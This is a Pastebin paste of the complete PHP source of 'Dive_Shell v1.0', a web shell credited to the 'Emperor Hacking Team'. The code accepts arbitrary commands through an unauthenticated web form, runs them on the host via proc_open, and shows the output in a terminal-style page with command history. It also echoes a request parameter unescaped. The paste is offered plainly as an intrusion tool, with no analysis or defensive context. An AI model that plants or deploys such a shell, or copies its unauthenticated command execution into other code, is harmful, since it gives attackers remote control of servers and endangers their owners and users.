API tools faq
paste
FlyFar

Dive_Shell v1.0 - Emperor Hacking Team

FlyFar
Feb 9th, 2024
100
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.56 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*Emperor Hacking TEAM */
  4.   session_start();
  5. if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  6.     $_SESSION['cwd'] = getcwd();
  7.     $_SESSION['history'] = array();
  8.     $_SESSION['output'] = '';
  9.   }
  10.  
  11.   if (!empty($_REQUEST['command'])) {
  12.     if (get_magic_quotes_gpc()) {
  13.       $_REQUEST['command'] = stripslashes($_REQUEST['command']);
  14.     }
  15.     if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
  16.       unset($_SESSION['history'][$i]);
  17.    
  18.     array_unshift($_SESSION['history'], $_REQUEST['command']);
  19.  
  20.     $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
  21.  
  22.     if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
  23.       $_SESSION['cwd'] = dirname(__FILE__);
  24.     } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
  25.  
  26.       if ($regs[1][0] == '/') {
  27.  
  28.         $new_dir = $regs[1];
  29.       } else {
  30.  
  31.         $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
  32.       }
  33.      
  34.  
  35.       while (strpos($new_dir, '/./') !== false)
  36.         $new_dir = str_replace('/./', '/', $new_dir);
  37.  
  38.  
  39.       while (strpos($new_dir, '//') !== false)
  40.         $new_dir = str_replace('//', '/', $new_dir);
  41.  
  42.       while (preg_match('|/\.\.(?!\.)|', $new_dir))
  43.         $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
  44.      
  45.       if ($new_dir == '') $new_dir = '/';
  46.      
  47.  
  48.       if (@chdir($new_dir)) {
  49.         $_SESSION['cwd'] = $new_dir;
  50.       } else {
  51.         $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
  52.       }
  53.      
  54.     } else {
  55.  
  56.       chdir($_SESSION['cwd']);
  57.  
  58.       $length = strcspn($_REQUEST['command'], " \t");
  59.       $token = substr($_REQUEST['command'], 0, $length);
  60.       if (isset($aliases[$token]))
  61.         $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
  62.    
  63.       $p = proc_open($_REQUEST['command'],
  64.                      array(1 => array('pipe', 'w'),
  65.                            2 => array('pipe', 'w')),
  66.                      $io);
  67.  
  68.  
  69.       while (!feof($io[1])) {
  70.         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
  71.                                                 ENT_COMPAT, 'UTF-8');
  72.       }
  73.  
  74.       while (!feof($io[2])) {
  75.         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
  76.                                                 ENT_COMPAT, 'UTF-8');
  77.       }
  78.      
  79.       fclose($io[1]);
  80.       fclose($io[2]);
  81.       proc_close($p);
  82.     }
  83.   }
  84.  
  85.  
  86.   if (empty($_SESSION['history'])) {
  87.     $js_command_hist = '""';
  88.   } else {
  89.     $escaped = array_map('addslashes', $_SESSION['history']);
  90.     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
  91.   }
  92.  
  93.  
  94. header('Content-Type: text/html; charset=UTF-8');
  95.  
  96. echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
  97. ?>
  98.  
  99. <head>
  100.   <title>Dive Shell - Emperor Hacking Team</title>
  101.   <link rel="stylesheet" href="Simshell.css" type="text/css" />
  102.  
  103.   <script type="text/javascript" language="JavaScript">
  104.   var current_line = 0;
  105.   var command_hist = new Array(<?php echo $js_command_hist ?>);
  106.   var last = 0;
  107.  
  108.   function key(e) {
  109.     if (!e) var e = window.event;
  110.  
  111.     if (e.keyCode == 38 && current_line < command_hist.length-1) {
  112.       command_hist[current_line] = document.shell.command.value;
  113.       current_line++;
  114.       document.shell.command.value = command_hist[current_line];
  115.     }
  116.  
  117.     if (e.keyCode == 40 && current_line > 0) {
  118.       command_hist[current_line] = document.shell.command.value;
  119.       current_line--;
  120.       document.shell.command.value = command_hist[current_line];
  121.     }
  122.  
  123.   }
  124.  
  125. function init() {
  126.   document.shell.setAttribute("autocomplete", "off");
  127.   document.shell.output.scrollTop = document.shell.output.scrollHeight;
  128.   document.shell.command.focus();
  129. }
  130.  
  131.   </script>
  132. </head>
  133.  
  134. <body   onload="init()" style="color: #00FF00; background-color: #000000">
  135.  
  136. <span style="background-color: #FFFFFF">
  137.  
  138.  
  139.  
  140. </body>
  141.  
  142. </body>
  143. </html>
  144.  
  145.  
  146.  
  147. </span>
  148.  
  149.  
  150.  
  151. <p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
  152. <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
  153. </font></p>
  154.  
  155. <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
  156. <div style="width: 989; height: 456">
  157.   <p align="center"><b>
  158.   <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
  159.                 onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
  160.   <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
  161.   </font>
  162.   &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
  163. <?php
  164. $lines = substr_count($_SESSION['output'], "\n");
  165. $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
  166. echo rtrim($padding . $_SESSION['output']);
  167. ?>
  168. </textarea> </p>
  169. <p class="prompt" align="center">
  170.   <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
  171.   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
  172. <p class="prompt" align="center">
  173.   <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
  174. <p class="prompt" align="center">
  175.   <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
  176. &nbsp;</font></p>
  177. </div>
  178. </form>
  179.  
  180.  
  181. <p class="prompt" align="center">
  182.   <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
  183.   </b></p>
  184.  
  185.  
  186.  
  187. </html>
Tags: Webshell php
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!